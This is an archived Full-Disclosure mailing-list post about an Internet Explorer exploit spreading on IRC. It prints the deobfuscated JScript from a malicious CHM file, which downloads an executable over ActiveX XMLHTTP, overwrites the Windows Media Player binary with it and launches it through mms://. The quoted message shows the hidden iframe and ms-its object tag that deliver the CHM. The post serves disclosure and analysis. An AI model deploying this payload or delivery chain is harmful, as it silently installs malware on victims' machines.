lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: fharvey at securiweb.net (Fran├žois Harvey)
Subject: IE exploit going around on irc

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
source of the jscript inside the chm

have a nice day

<SCRIPT LANGUAGE="javascript">

~    function getPath(url) {
~        start = url.indexOf('http:')
~        end = url.indexOf('LOI.CHM')
~        return url.substring(start, end);
~    }

~    tehaa = 'ADO' + 'DB' + '.St' + 'ream';
~    tehao = 'Micro' + 'soft.XM' + 'LHTTP';
~    tehex = '.exe';
~    tehwmp = 'C:\\Pr' + 'ogram Files\\Win' + 'dows Media Player\\wmpl'
+ 'ayer' + tehex;
~    tehmms = 'm' + 'm' + 's' + ':/' + '/';

~    var tehf = new ActiveXObject(tehaa);
~    tehf.Mode = 3;
~    tehf.Type = 1;

~    tehgURLf = getPath(location.href)+'loi' + tehex;

~    var tehg = new ActiveXObject(tehao);
~    tehg.Open("GET",tehgURLf,0);
~    tehg.Send();

~    tehf.Open();
~    tehf.Write(tehg.responseBody);

~    tehf.SaveToFile(tehwmp,2);
~    location.href = tehmms;

</SCRIPT>

Francois Harvey
SecuriWeb inc.

Niek Baakman a ?crit :

| Hi list,
|
| this thing's been going around on irc the last few days:
|
| www.divx.dc-hub.com (IE users don't click it!) check source:
| <iframe src='loi.htm' width=0 height=0></iframe>
|
| loi.htm contains: <object
| data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
|  type="text/x-scriptlet"></object>
|
|
| LOI.CHM is attached
|
| Regards,
|
| Niek Baakman
|

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
 
iD8DBQFAca0ebw9u6+cJxl4RAphzAJ9TRgSBuaPatVFbXBfzqBoKmbrHCACeJ/X8
FZvzRZU2LDEPQyJ0lVMXWiQ=
=Bvkg
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists